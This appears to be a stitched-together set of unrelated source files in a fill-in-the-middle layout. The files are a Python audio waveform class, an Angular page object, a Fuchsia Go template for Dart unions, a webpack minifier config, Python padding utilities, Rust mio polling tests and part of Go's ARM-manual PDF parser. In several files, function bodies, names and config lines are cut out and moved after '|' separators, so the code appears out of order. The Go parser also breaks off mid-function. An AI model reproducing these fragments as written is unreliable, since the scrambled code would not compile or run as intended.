if __name__ == '__main__':
main()
| """Parse argument options."""
parser = argparse.ArgumentParser(description='%(prog)s usage:',
prog=__prog__)
setoption(parser, metadata=metadata)
return parser |
audio.py | from __future__ import annotations
from dataclasses import dataclass
import pydub
from sauronlab.core.core_imports import *
class AudioTools:
""" """
@classmethod
def save(
cls, audio_segment: pydub.AudioSegment, path: PathLike, audio_format: str = "flac"
) -> None:
path = Tools.prepped_file(path)
audio_segment.export(path, format=audio_format)
@classmethod
def load_pydub(cls, path: PathLike) -> pydub.AudioSegment:
path = str(Path(path))
# TODO sample_width=2, frame_rate=44100, channels=1 ???
return pydub.AudioSegment.from_file(path)
@dataclass(frozen=True)
class Waveform:
"""
Contains an array representing an audio waveform.
Aso has a sampling rate, a name, an optional description, and optional file path.
"""
name: str
path: Optional[str]
data: np.array
sampling_rate: float
minimum: Optional[float]
maximum: Optional[float]
description: Optional[str] = None
start_ms: Optional[float] = None
end_ms: Optional[float] = None
@property
def n_ms(self) -> float:
""""""
return len(self.data) / self.sampling_rate * 1000
def standardize(
self, minimum: float = 0, maximum: float = 255, ms_freq: int = 1000
) -> Waveform:
"""
Downsampling to **1000 Hz** and normalizes to between 0 and 255.
This is useful for various purposes in Sauronlab, such as embedding into plots.
Args:
minimum:
maximum:
ms_freq:
Returns:
"""
if minimum < 0 or maximum > 255:
raise OutOfRangeError("Must be between 0 and 255")
y = self.downsample(ms_freq).data
y = (y - y.min()) * (maximum - minimum) / (y.max() - y.min()) + minimum
y = y.round().astype(np.int32)
s = Waveform(self.name, self.path, y, 1000, minimum, maximum, self.description)
# s.n_ms = int(s.n_ms) # TODO: all ok, right?
return s
def normalize(self, minimum: float = -1, maximum: float = 1) -> Waveform:
|
def downsample(self, new_sampling_hertz: float) -> Waveform:
"""
Downsamples to a new rate.
Splits data into discrete chunks and then calculates mean for those chunks.
Args:
new_sampling_hertz: A float such as 44100
Returns:
The same Waveform as a copy
"""
t0 = time.monotonic()
if new_sampling_hertz > self.sampling_rate:
raise OutOfRangeError(
f"New sampling rate is higher than current of {self.sampling_rate}"
)
chunk_size = int(self.sampling_rate / new_sampling_hertz)
groups = [self.data[x : x + chunk_size] for x in range(0, len(self.data), chunk_size)]
means = np.array([sum(group) / len(group) for group in groups])
z = Waveform(
self.name,
self.path,
means,
new_sampling_hertz,
self.minimum,
self.maximum,
self.description,
)
logger.debug(f"Downsampling waveform ({self.name}) took {round(time.monotonic()-t0, 1)} s")
return z
def slice_ms(self, start_ms: int, end_ms: int) -> Waveform:
"""
Gets a section of the waveform.
Args:
start_ms: The start milliseconds
end_ms: The end milliseconds
Returns:
The same Waveform as a copy
"""
a = int(round(self.sampling_rate * start_ms / 1000))
b = int(round(self.sampling_rate * end_ms / 1000))
return Waveform(
self.name,
self.path,
self.data[a:b],
self.sampling_rate,
self.minimum,
self.maximum,
self.description,
a,
b,
)
def __repr__(self):
me = self.__class__.__name__
sec = round(self.n_ms / 1000, 1)
return (
f"{me}({self.name} @ {self.sampling_rate}, n={len(self.data)}, {sec}s"
+ f" {self.minimum}-{self.maximum}"
)
def __str__(self):
return repr(self)
__all__ = ["AudioTools", "Waveform"]
| """
Constraints values between -1 and 1.
Args:
minimum: Normally -1
maximum: Normally 1
Returns:
The same Waveform as a copy
"""
y = (self.data - self.data.min()) * (maximum - minimum) / (
self.data.max() - self.data.min()
) + minimum
logger.error(f"Normalized {self.name}. max={y.max()}, min={y.min()}")
return Waveform(
self.name, self.path, y, self.sampling_rate, minimum, maximum, self.description
) |
app.po.ts | import { browser, by, element } from 'protractor';
export class | {
navigateTo() {
return browser.get('/');
}
getParagraphText() {
return element(by.css('app-root h1 small')).getText();
}
}
| AppPage |
xunion.tmpl.go | // Copyright 2019 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package templates
| const XUnion = `
{{- define "XUnionDeclaration" -}}
enum {{ .TagName }} {
{{- range .Members }}
{{ .Tag }}, // {{ .Ordinal | printf "%#x" }}
{{- end }}
}
const Map<int, {{ .TagName }}> _{{ .TagName }}_map = {
{{- range .Members }}
{{ .Ordinal }}: {{ $.TagName }}.{{ .Tag }},
{{- end }}
};
{{range .Doc }}
///{{ . -}}
{{- end }}
class {{ .Name }} extends $fidl.XUnion {
{{- range .Members }}
const {{ $.Name }}.with{{ .CtorName }}({{ .Type.Decl }} value)
: _ordinal = {{ .Ordinal }}, _data = value;
{{- end }}
{{ .Name }}._(int ordinal, Object data) : _ordinal = ordinal, _data = data;
final int _ordinal;
final _data;
{{ .TagName }} get $tag => _{{ .TagName }}_map[_ordinal];
{{range .Members }}
{{ .Type.Decl }} get {{ .Name }} {
if (_ordinal != {{ .Ordinal }}) {
return null;
}
return _data;
}
{{- end }}
@override
String toString() {
switch (_ordinal) {
{{- range .Members }}
case {{ .Ordinal }}:
return '{{ $.Name }}.{{ .Name }}(${{ .Name }})';
{{- end }}
default:
return null;
}
}
@override
int get $ordinal => _ordinal;
@override
Object get $data => _data;
static {{ .Name }} _ctor(int ordinal, Object data) {
return {{ .Name }}._(ordinal, data);
}
}
// See FIDL-308:
// ignore: recursive_compile_time_constant
const $fidl.XUnionType<{{ .Name }}> {{ .TypeSymbol }} = {{ .TypeExpr }};
const $fidl.XUnionType<{{ .Name }}> {{ .OptTypeSymbol }} = {{ .OptTypeExpr }};
{{ end }}
` | // XUnion is the template for xunion declarations. |
optimization.ts | const UglifyJsPlugin = require("uglifyjs-webpack-plugin");
const OptimizeCSSAssetsPlugin = require("optimize-css-assets-webpack-plugin");
const cssnano = require("cssnano");
import CoreAPI from "../../CoreAPI";
import { isProductionEnv, isDevelopmentEnv } from "../../utils/environment";
export default (api: CoreAPI) => {
api.chainWebpack(webpackChain => {
if (isProductionEnv()) {
webpackChain.optimization
.splitChunks({
cacheGroups: {
commons: {
test: /[\\/]node_modules[\\/]/,
name: "vendor",
chunks: "initial"
}
}
})
.minimizer("script")
.use(UglifyJsPlugin, [
{
cache: true,
parallel: true,
uglifyOptions: {
ecma: 5,
mangle: true, | },
sourceMap: false // FIXME: support source map from option
}
])
.end()
.minimizer("css")
.use(OptimizeCSSAssetsPlugin, [
{
assetNameRegExp: /\.css$/g,
cssProcessor: cssnano,
cssProcessorOptions: {
reduceIdents: false,
mergeIdents: false,
discardUnused: false,
autoprefixer: false,
zindex: false,
map: false // FIXME: support source map from option
}
}
])
.end();
}
});
}; | compress: {
drop_console: true
} |
utils.py | import os
import pickle
import torch
import numpy as np
def save(toBeSaved, filename, mode='wb'):
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
file = open(filename, mode)
pickle.dump(toBeSaved, file)
file.close()
def load(filename, mode='rb'):
file = open(filename, mode)
loaded = pickle.load(file)
file.close()
return loaded
def pad_sents(sents, pad_token):
sents_padded = []
lens = get_lens(sents)
max_len = max(lens)
sents_padded = [sents[i] + [pad_token] * (max_len - l) for i, l in enumerate(lens)]
return sents_padded
def sort_sents(sents, reverse=True):
sents.sort(key=(lambda s: len(s)), reverse=reverse)
return sents
def get_mask(sents, unmask_idx=1, mask_idx=0):
lens = get_lens(sents)
max_len = max(lens)
mask = [([unmask_idx] * l + [mask_idx] * (max_len - l)) for l in lens]
return mask
def get_lens(sents):
return [len(sent) for sent in sents]
def get_max_len(sents):
max_len = max([len(sent) for sent in sents])
return max_len
def truncate_sents(sents, length):
|
def get_loss_weight(labels, label_order):
nums = [np.sum(labels == lo) for lo in label_order]
loss_weight = torch.tensor([n / len(labels) for n in nums])
return loss_weight
| sents = [sent[:length] for sent in sents]
return sents |
poll.rs | #![cfg(all(feature = "os-poll", feature = "tcp"))]
use mio::event::Source;
use mio::net::{TcpListener, TcpStream, UdpSocket};
use mio::{event, Events, Interest, Poll, Registry, Token};
use std::net;
use std::sync::{Arc, Barrier};
use std::thread::{self, sleep};
use std::time::Duration;
use std::{fmt, io};
mod util;
use util::{
any_local_address, assert_send, assert_sync, expect_events, init, init_with_poll, ExpectEvent,
};
const ID1: Token = Token(1);
const ID2: Token = Token(2);
const ID3: Token = Token(3);
#[test]
fn is_send_and_sync() {
assert_send::<Events>();
assert_sync::<Events>();
assert_sync::<Poll>();
assert_send::<Poll>();
assert_sync::<Registry>();
assert_send::<Registry>();
}
#[test]
fn run_once_with_nothing() {
init();
let mut events = Events::with_capacity(16);
let mut poll = Poll::new().unwrap();
poll.poll(&mut events, Some(Duration::from_millis(100)))
.unwrap();
}
#[test]
fn add_then_drop() {
init();
let mut events = Events::with_capacity(16);
let mut l = TcpListener::bind(any_local_address()).unwrap();
let mut poll = Poll::new().unwrap();
poll.registry()
.register(&mut l, Token(1), Interest::READABLE | Interest::WRITABLE)
.unwrap();
drop(l);
poll.poll(&mut events, Some(Duration::from_millis(100)))
.unwrap();
}
#[test]
fn zero_duration_polls_events() {
init();
let mut poll = Poll::new().unwrap();
let mut events = Events::with_capacity(16);
let listener = net::TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
let streams: Vec<TcpStream> = (0..3)
.map(|n| {
let mut stream = TcpStream::connect(addr).unwrap();
poll.registry()
.register(&mut stream, Token(n), Interest::WRITABLE)
.unwrap();
stream
})
.collect();
// Ensure the TcpStreams have some time to connection and for the events to
// show up.
sleep(Duration::from_millis(10));
// Even when passing a zero duration timeout we still want do the system
// call.
poll.poll(&mut events, Some(Duration::from_nanos(0)))
.unwrap();
assert!(!events.is_empty());
// Both need to live until here.
drop(streams);
drop(listener);
}
#[test]
fn poll_closes_fd() {
init();
for _ in 0..2000 {
let mut poll = Poll::new().unwrap();
let mut events = Events::with_capacity(4);
poll.poll(&mut events, Some(Duration::from_millis(0)))
.unwrap();
drop(poll);
}
}
#[test]
fn drop_cancels_interest_and_shuts_down() {
init();
use mio::net::TcpStream;
use std::io;
use std::io::Read;
use std::net::TcpListener;
use std::thread;
let l = TcpListener::bind("127.0.0.1:0").unwrap();
let addr = l.local_addr().unwrap();
let t = thread::spawn(move || {
let mut s = l.incoming().next().unwrap().unwrap();
s.set_read_timeout(Some(Duration::from_secs(5)))
.expect("set_read_timeout");
let r = s.read(&mut [0; 16]);
match r {
Ok(_) => (),
Err(e) => {
if e.kind() != io::ErrorKind::UnexpectedEof {
panic!(e);
}
}
}
});
let mut poll = Poll::new().unwrap();
let mut s = TcpStream::connect(addr).unwrap();
poll.registry()
.register(&mut s, Token(1), Interest::READABLE | Interest::WRITABLE)
.unwrap();
let mut events = Events::with_capacity(16);
'outer: loop {
poll.poll(&mut events, None).unwrap();
for event in &events {
if event.token() == Token(1) {
// connected
break 'outer;
}
}
}
let mut b = [0; 1024];
match s.read(&mut b) {
Ok(_) => panic!("unexpected ok"),
Err(ref e) if e.kind() == io::ErrorKind::WouldBlock => (),
Err(e) => panic!("unexpected error: {:?}", e),
}
drop(s);
t.join().unwrap();
}
#[test]
fn registry_behind_arc() {
// `Registry` should work behind an `Arc`, being `Sync` and `Send`.
init();
let mut poll = Poll::new().unwrap();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let mut events = Events::with_capacity(128);
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
let barrier = Arc::new(Barrier::new(3));
let registry2 = Arc::clone(®istry);
let registry3 = Arc::clone(®istry);
let barrier2 = Arc::clone(&barrier);
let barrier3 = Arc::clone(&barrier);
let handle1 = thread::spawn(move || {
registry2
.register(&mut listener, Token(0), Interest::READABLE)
.unwrap();
barrier2.wait();
});
let handle2 = thread::spawn(move || {
let mut stream = TcpStream::connect(addr).unwrap();
registry3
.register(
&mut stream,
Token(1),
Interest::READABLE | Interest::WRITABLE,
)
.unwrap();
barrier3.wait();
});
poll.poll(&mut events, Some(Duration::from_millis(1000)))
.unwrap();
assert!(events.iter().count() >= 1);
// Let the threads return.
barrier.wait();
handle1.join().unwrap();
handle2.join().unwrap();
}
/// Call all registration operations, ending with `source` being registered with `token` and `final_interests`.
pub fn registry_ops_flow(
registry: &Registry,
source: &mut dyn Source,
token: Token,
init_interests: Interest,
final_interests: Interest,
) -> io::Result<()> {
registry.register(source, token, init_interests).unwrap();
registry.deregister(source).unwrap();
registry.register(source, token, init_interests).unwrap();
registry.reregister(source, token, final_interests)
}
#[test]
fn registry_operations_are_thread_safe() |
#[test]
fn register_during_poll() {
let (mut poll, mut events) = init_with_poll();
let registry = poll.registry().try_clone().unwrap();
let barrier = Arc::new(Barrier::new(2));
let barrier1 = Arc::clone(&barrier);
let handle1 = thread::spawn(move || {
let mut stream = UdpSocket::bind(any_local_address()).unwrap();
barrier1.wait();
// Get closer to "trying" to register during a poll by doing a short
// sleep before register to give main thread enough time to start
// waiting the 5 sec long poll.
sleep(Duration::from_millis(200));
registry
.register(&mut stream, ID1, Interest::WRITABLE)
.unwrap();
barrier1.wait();
drop(stream);
});
// Unlock the thread, allow it to register the `UdpSocket`.
barrier.wait();
// Concurrently (at least we attempt to) call `Poll::poll`.
poll.poll(&mut events, Some(Duration::from_secs(5)))
.unwrap();
let mut iter = events.iter();
let event = iter.next().expect("expect an event");
assert_eq!(event.token(), ID1);
assert!(event.is_writable());
assert!(iter.next().is_none(), "unexpected extra event");
barrier.wait();
handle1.join().unwrap();
}
// This test checks the following reregister constraints:
// - `reregister` arguments fully override the previous values. In other
// words, if a socket is registered with `READABLE` interest and the call
// to `reregister` specifies `WRITABLE`, then read interest is no longer
// requested for the handle.
// - `reregister` can use the same token as `register`
// - `reregister` can use different token from `register`
// - multiple `reregister` are ok
#[test]
fn reregister_interest_token_usage() {
let (mut poll, mut events) = init_with_poll();
let mut udp_socket = UdpSocket::bind(any_local_address()).unwrap();
poll.registry()
.register(&mut udp_socket, ID1, Interest::READABLE)
.expect("unable to register listener");
poll.registry()
.reregister(&mut udp_socket, ID1, Interest::READABLE)
.expect("unable to register listener");
poll.registry()
.reregister(&mut udp_socket, ID2, Interest::WRITABLE)
.expect("unable to register listener");
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID2, Interest::WRITABLE)],
);
}
// This test checks the following register constraint:
// The event source must **not** have been previously registered with this
// instance of `Poll`, otherwise the behavior is undefined.
//
// This test is done on Windows and epoll platforms where registering a
// source twice is defined behavior that fail with an error code.
//
// On kqueue platforms registering twice (not *re*registering) works, but that
// is not a test goal, so it is not tested.
#[test]
#[cfg(any(target_os = "linux", target_os = "windows"))]
pub fn double_register_different_token() {
init();
let poll = Poll::new().unwrap();
let mut l = TcpListener::bind("127.0.0.1:0".parse().unwrap()).unwrap();
poll.registry()
.register(&mut l, Token(0), Interest::READABLE)
.unwrap();
assert!(poll
.registry()
.register(&mut l, Token(1), Interest::READABLE)
.is_err());
}
#[test]
fn poll_ok_after_cancelling_pending_ops() {
let (mut poll, mut events) = init_with_poll();
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let address = listener.local_addr().unwrap();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let registry1 = Arc::clone(®istry);
let barrier = Arc::new(Barrier::new(2));
let barrier1 = Arc::clone(&barrier);
registry
.register(&mut listener, ID1, Interest::READABLE)
.unwrap();
// Call a dummy poll just to submit an afd poll request
poll.poll(&mut events, Some(Duration::from_millis(0)))
.unwrap();
// This reregister will cancel the previous pending poll op.
// The token is different from the register done above, so it can ensure
// the proper event got returned expect_events below.
registry
.reregister(&mut listener, ID2, Interest::READABLE)
.unwrap();
let handle = thread::spawn(move || {
let mut stream = TcpStream::connect(address).unwrap();
barrier1.wait();
registry1
.register(&mut stream, ID3, Interest::WRITABLE)
.unwrap();
barrier1.wait();
});
// listener ready to accept stream? getting `READABLE` here means the
// cancelled poll op was cleared, another poll request was submitted
// which resulted in returning this event
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID2, Interest::READABLE)],
);
let (_, _) = listener.accept().unwrap();
barrier.wait();
// for the sake of completeness check stream `WRITABLE`
expect_events(
&mut poll,
&mut events,
vec![ExpectEvent::new(ID3, Interest::WRITABLE)],
);
barrier.wait();
handle.join().expect("unable to join thread");
}
struct TestEventSource {
registrations: Vec<(Token, Interest)>,
reregistrations: Vec<(Token, Interest)>,
deregister_count: usize,
}
impl TestEventSource {
fn new() -> TestEventSource {
TestEventSource {
registrations: Vec::new(),
reregistrations: Vec::new(),
deregister_count: 0,
}
}
}
impl event::Source for TestEventSource {
fn register(
&mut self,
_registry: &Registry,
token: Token,
interests: Interest,
) -> io::Result<()> {
self.registrations.push((token, interests));
Ok(())
}
fn reregister(
&mut self,
_registry: &Registry,
token: Token,
interests: Interest,
) -> io::Result<()> {
self.reregistrations.push((token, interests));
Ok(())
}
fn deregister(&mut self, _registry: &Registry) -> io::Result<()> {
self.deregister_count += 1;
Ok(())
}
}
#[test]
fn poll_registration() {
init();
let poll = Poll::new().unwrap();
let registry = poll.registry();
let mut source = TestEventSource::new();
let token = Token(0);
let interests = Interest::READABLE;
registry.register(&mut source, token, interests).unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.registrations.get(0), Some(&(token, interests)));
assert!(source.reregistrations.is_empty());
assert_eq!(source.deregister_count, 0);
let re_token = Token(0);
let re_interests = Interest::READABLE;
registry
.reregister(&mut source, re_token, re_interests)
.unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.reregistrations.len(), 1);
assert_eq!(
source.reregistrations.get(0),
Some(&(re_token, re_interests))
);
assert_eq!(source.deregister_count, 0);
registry.deregister(&mut source).unwrap();
assert_eq!(source.registrations.len(), 1);
assert_eq!(source.reregistrations.len(), 1);
assert_eq!(source.deregister_count, 1);
}
struct ErroneousTestEventSource;
impl event::Source for ErroneousTestEventSource {
fn register(
&mut self,
_registry: &Registry,
_token: Token,
_interests: Interest,
) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "register"))
}
fn reregister(
&mut self,
_registry: &Registry,
_token: Token,
_interests: Interest,
) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "reregister"))
}
fn deregister(&mut self, _registry: &Registry) -> io::Result<()> {
Err(io::Error::new(io::ErrorKind::Other, "deregister"))
}
}
#[test]
fn poll_erroneous_registration() {
init();
let poll = Poll::new().unwrap();
let registry = poll.registry();
let mut source = ErroneousTestEventSource;
let token = Token(0);
let interests = Interest::READABLE;
assert_error(registry.register(&mut source, token, interests), "register");
assert_error(
registry.reregister(&mut source, token, interests),
"reregister",
);
assert_error(registry.deregister(&mut source), "deregister");
}
/// Assert that `result` is an error and the formatted error (via
/// `fmt::Display`) equals `expected_msg`.
pub fn assert_error<T, E: fmt::Display>(result: Result<T, E>, expected_msg: &str) {
match result {
Ok(_) => panic!("unexpected OK result"),
Err(err) => assert!(
err.to_string().contains(expected_msg),
"wanted: {}, got: {}",
err,
expected_msg
),
}
}
| {
let (mut poll, mut events) = init_with_poll();
let registry = Arc::new(poll.registry().try_clone().unwrap());
let registry1 = Arc::clone(®istry);
let registry2 = Arc::clone(®istry);
let registry3 = Arc::clone(®istry);
let barrier = Arc::new(Barrier::new(4));
let barrier1 = Arc::clone(&barrier);
let barrier2 = Arc::clone(&barrier);
let barrier3 = Arc::clone(&barrier);
let mut listener = TcpListener::bind(any_local_address()).unwrap();
let addr = listener.local_addr().unwrap();
// Expect that multiple register/deregister/reregister work fine on multiple
// threads. Main thread will wait before the expect_events for all other 3
// threads to do their work. Otherwise expect_events timeout might be too short
// for all threads to complete, and call might fail.
let handle1 = thread::spawn(move || {
registry_ops_flow(
®istry1,
&mut listener,
ID1,
Interest::READABLE,
Interest::READABLE,
)
.unwrap();
barrier1.wait();
barrier1.wait();
});
let handle2 = thread::spawn(move || {
let mut udp_socket = UdpSocket::bind(any_local_address()).unwrap();
registry_ops_flow(
®istry2,
&mut udp_socket,
ID2,
Interest::WRITABLE,
Interest::WRITABLE.add(Interest::READABLE),
)
.unwrap();
barrier2.wait();
barrier2.wait();
});
let handle3 = thread::spawn(move || {
let mut stream = TcpStream::connect(addr).unwrap();
registry_ops_flow(
®istry3,
&mut stream,
ID3,
Interest::READABLE,
Interest::READABLE | Interest::WRITABLE,
)
.unwrap();
barrier3.wait();
barrier3.wait();
});
// wait for threads to finish before expect_events
barrier.wait();
expect_events(
&mut poll,
&mut events,
vec![
ExpectEvent::new(ID1, Interest::READABLE),
ExpectEvent::new(ID2, Interest::WRITABLE),
ExpectEvent::new(ID3, Interest::WRITABLE),
],
);
// Let the threads return.
barrier.wait();
handle1.join().unwrap();
handle2.join().unwrap();
handle3.join().unwrap();
} |
spec.go | // Copyright 2014 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Armspec reads the ``ARM Architecture Reference Manual''
// to collect instruction encoding details and writes those details to standard output
// in JSON format.
//
// Warning Warning Warning
//
// This program is unfinished. It is being published in this incomplete form
// for interested readers, but do not expect it to be runnable or useful.
//
package main
import (
"bufio"
"bytes"
"encoding/json"
"fmt"
"log"
"math"
"os"
"regexp"
"sort"
"strconv"
"strings"
"rsc.io/pdf"
)
type Inst struct {
Name string
ID string
Bits string
Arch string
Syntax []string
Code string
}
const debugPage = 0
var stdout *bufio.Writer
func main() {
log.SetFlags(0)
log.SetPrefix("armspec: ")
if len(os.Args) != 2 {
fmt.Fprintf(os.Stderr, "usage: armspec file.pdf\n")
os.Exit(2)
}
f, err := pdf.Open(os.Args[1])
if err != nil {
log.Fatal(err)
}
// Find instruction set reference in outline, to build instruction list.
instList := instHeadings(f.Outline())
if len(instList) < 200 {
log.Fatalf("only found %d instructions in table of contents", len(instList))
}
stdout = bufio.NewWriter(os.Stdout)
fmt.Fprintf(stdout, "[")
numTable := 0
defer stdout.Flush()
// Scan document looking for instructions.
// Must find exactly the ones in the outline.
n := f.NumPage()
PageLoop:
for pageNum := 1; pageNum <= n; pageNum++ {
if debugPage > 0 && pageNum != debugPage {
continue
}
if pageNum > 1127 {
break
}
p := f.Page(pageNum)
name, table := parsePage(pageNum, p)
if name == "" {
continue
}
if len(table) < 1 {
if false {
fmt.Fprintf(os.Stderr, "no encodings for instruction %q (page %d)\n", name, pageNum)
}
continue
}
for _, inst := range table {
if numTable > 0 {
fmt.Fprintf(stdout, ",")
}
numTable++
js, _ := json.Marshal(inst)
fmt.Fprintf(stdout, "\n%s", jsFix.Replace(string(js)))
}
for j, headline := range instList {
if name == headline {
instList[j] = ""
continue PageLoop
}
}
fmt.Fprintf(os.Stderr, "unexpected instruction %q (page %d)\n", name, pageNum)
}
fmt.Fprintf(stdout, "\n]\n")
stdout.Flush()
if debugPage == 0 {
for _, headline := range instList {
if headline != "" {
switch headline {
default:
fmt.Fprintf(os.Stderr, "missing instruction %q\n", headline)
case "CHKA": // ThumbEE
case "CPS": // system instruction
case "CPY": // synonym for MOV
case "ENTERX": // ThumbEE
case "F* (former VFP instruction mnemonics)": // synonyms
case "HB, HBL, HBLP, HBP": // ThumbEE
case "LEAVEX": // ThumbEE
case "MOV (shifted register)": // pseudo instruction for ASR, LSL, LSR, ROR, and RRX
case "NEG": // synonym for RSB
case "RFE": // system instruction
case "SMC (previously SMI)": // system instruction
case "SRS": // system instruction
case "SUBS PC, LR and related instructions": // system instruction
case "VAND (immediate)": // pseudo instruction
case "VCLE (register)": // pseudo instruction
case "VCLT (register)": // pseudo instruction
case "VORN (immediate)": // pseudo instruction
}
}
}
}
}
func instHeadings(outline pdf.Outline) []string {
return appendInstHeadings(outline, nil)
}
var instRE = regexp.MustCompile(`A[\d.]+ Alphabetical list of instructions`)
var childRE = regexp.MustCompile(`A[\d.]+ (.+)`)
var sectionRE = regexp.MustCompile(`^A[\d.]+$`)
var bitRE = regexp.MustCompile(`^( |[01]|\([01]\))*$`)
func appendInstHeadings(outline pdf.Outline, list []string) []string {
if instRE.MatchString(outline.Title) {
for _, child := range outline.Child {
m := childRE.FindStringSubmatch(child.Title)
if m == nil {
fmt.Fprintf(os.Stderr, "cannot parse section title: %s\n", child.Title)
continue
}
list = append(list, m[1])
}
}
for _, child := range outline.Child {
list = appendInstHeadings(child, list)
}
return list
}
const inch = 72.0
func | (num int, p pdf.Page) (name string, table []Inst) {
content := p.Content()
var text []pdf.Text
for _, t := range content.Text {
if match(t, "Times-Roman", 7.2, "") {
t.FontSize = 9
}
if match(t, "Times-Roman", 6.72, "") && '0' <= t.S[0] && t.S[0] <= '9' {
t.S = string([]rune("⁰¹²³⁴⁵⁶⁷⁸⁹")[t.S[0]-'0'])
t.FontSize = 9
t.Y -= 2.28
}
if t.Font == "Gen_Arial" {
continue
}
text = append(text, t)
}
text = findWords(text)
for i, t := range text {
if t.Font == "Times" {
t.Font = "Times-Roman"
text[i] = t
}
}
if debugPage > 0 {
for _, t := range text {
fmt.Println(t)
}
for _, r := range content.Rect {
fmt.Println(r)
}
}
// Remove text we should ignore.
out := text[:0]
skip := false
for _, t := range text {
// skip page footer
if match(t, "Helvetica", 8, "A") || match(t, "Helvetica", 8, "ARM DDI") || match(t, "Helvetica-Oblique", 8, "Copyright") {
continue
}
// skip section header and body text
if match(t, "Helvetica-Bold", 12, "") && (sectionRE.MatchString(t.S) || t.S == "Alphabetical list of instructions") {
skip = true
continue
}
if skip && match(t, "Times-Roman", 9, "") {
continue
}
skip = false
out = append(out, t)
}
text = out
// Page header must say Instruction Details.
if len(text) == 0 || !match(text[0], "Helvetica-Oblique", 8, "Instruction Details") && !match(text[0], "Times-Roman", 9, "Instruction Details") {
return "", nil
}
text = text[1:]
isSection := func(text []pdf.Text, i int) int {
if i+2 <= len(text) && match(text[i], "Helvetica-Bold", 10, "") && sectionRE.MatchString(text[i].S) && match(text[i+1], "Helvetica-Bold", 10, "") {
return 2
}
if i+1 <= len(text) && match(text[i], "Helvetica-Bold", 10, "") && childRE.MatchString(text[i].S) {
return 1
}
return 0
}
// Skip dummy headlines and sections.
for d := isSection(text, 0); d != 0; d = isSection(text, 0) {
i := d
for i < len(text) && !match(text[i], "Helvetica-Bold", 9, "Encoding") && !match(text[i], "Helvetica-Bold", 10, "") {
i++
}
if isSection(text, i) == 0 {
break
}
text = text[i:]
}
// Next line is headline. Can wrap to multiple lines.
d := isSection(text, 0)
if d == 0 {
if debugPage > 0 {
fmt.Printf("non-inst-headline: %v\n", text[0])
}
checkNoEncodings(num, text)
return "", nil
}
if d == 2 {
name = text[1].S
text = text[2:]
} else if d == 1 {
m := childRE.FindStringSubmatch(text[0].S)
name = m[1]
text = text[1:]
}
for len(text) > 0 && match(text[0], "Helvetica-Bold", 10, "") {
name += " " + text[0].S
text = text[1:]
}
// Skip description.
for len(text) > 0 && (match(text[0], "Times-Roman", 9, "") || match(text[0], "LucidaSansTypewriteX", 6.48, "") || match(text[0], "Times-Bold", 10, "Note")) {
text = text[1:]
}
// Encodings follow.
warned := false
for i := 0; i < len(text); {
if match(text[i], "Helvetica-Bold", 10, "Assembler syntax") ||
match(text[i], "Helvetica-Bold", 9, "Modified operation in ThumbEE") ||
match(text[i], "Helvetica-Bold", 9, "Unallocated memory hints") ||
match(text[i], "Helvetica-Bold", 9, "Related encodings") ||
match(text[i], "Times-Roman", 9, "Figure A") ||
match(text[i], "Helvetica-Bold", 9, "Table A") ||
match(text[i], "Helvetica-Bold", 9, "VFP Instructions") ||
match(text[i], "Helvetica-Bold", 9, "VFP instructions") ||
match(text[i], "Helvetica-Bold", 9, "VFP vectors") ||
match(text[i], "Helvetica-Bold", 9, "FLDMX") ||
match(text[i], "Helvetica-Bold", 9, "FSTMX") ||
match(text[i], "Helvetica-Bold", 9, "Advanced SIMD and VFP") {
checkNoEncodings(num, text[i:])
break
}
if match(text[i], "Helvetica-Bold", 9, "Figure A") {
y := text[i].Y
i++
for i < len(text) && math.Abs(text[i].Y-y) < 2 {
i++
}
continue
}
if !match(text[i], "Helvetica-Bold", 9, "Encoding") {
if !warned {
warned = true
fmt.Fprintln(os.Stderr, "page", num, ": unexpected:", text[i])
}
i++
continue
}
inst := Inst{
Name: name,
}
enc := text[i].S
x := text[i].X
i++
// Possible subarchitecture notes.
for i < len(text) && text[i].X > x+36 {
if inst.Arch != "" {
inst.Arch += " "
}
inst.Arch += text[i].S
i++
}
// Encoding syntaxes.
for i < len(text) && (match(text[i], "LucidaSansTypewriteX", 6.48, "") || text[i].X > x+36) {
if text[i].X < x+0.25*inch {
inst.Syntax = append(inst.Syntax, text[i].S)
} else {
s := inst.Syntax[len(inst.Syntax)-1]
if !strings.Contains(s, "\t") {
s += "\t"
} else {
s += " "
}
s += text[i].S
inst.Syntax[len(inst.Syntax)-1] = s
}
i++
}
var bits, abits, aenc string
bits, i = readBitBox(inst.Name, inst.Syntax, content, text, i)
if strings.Contains(enc, " / ") {
if i < len(text) && match(text[i], "Times-Roman", 8, "") {
abits, i = readBitBox(inst.Name, inst.Syntax, content, text, i)
} else {
abits = bits
}
slash := strings.Index(enc, " / ")
aenc = "Encoding " + enc[slash+len(" / "):]
enc = enc[:slash]
}
// pseudocode
y0 := -1 * inch
tab := 0.0
for i < len(text) && match(text[i], "LucidaSansTypewriteX", 6.48, "") {
t := text[i]
i++
if math.Abs(t.Y-y0) < 3 {
// same line as last fragment, probably just two spaces
inst.Code += " " + t.S
continue
}
if inst.Code != "" {
inst.Code += "\n"
}
if t.X > x+0.1*inch {
if tab == 0 {
tab = t.X - x
}
inst.Code += strings.Repeat("\t", int((t.X-x)/tab+0.5))
} else {
tab = 0
}
inst.Code += t.S
y0 = t.Y
}
inst.ID = strings.TrimPrefix(enc, "Encoding ")
inst.Bits = bits
table = append(table, inst)
if abits != "" {
inst.ID = strings.TrimPrefix(aenc, "Encoding ")
inst.Bits = abits
table = append(table, inst)
}
}
return name, table
}
func readBitBox(name string, syntax []string, content pdf.Content, text []pdf.Text, i int) (string, int) {
// bit headings
y2 := 0.0
x1 := 0.0
x2 := 0.0
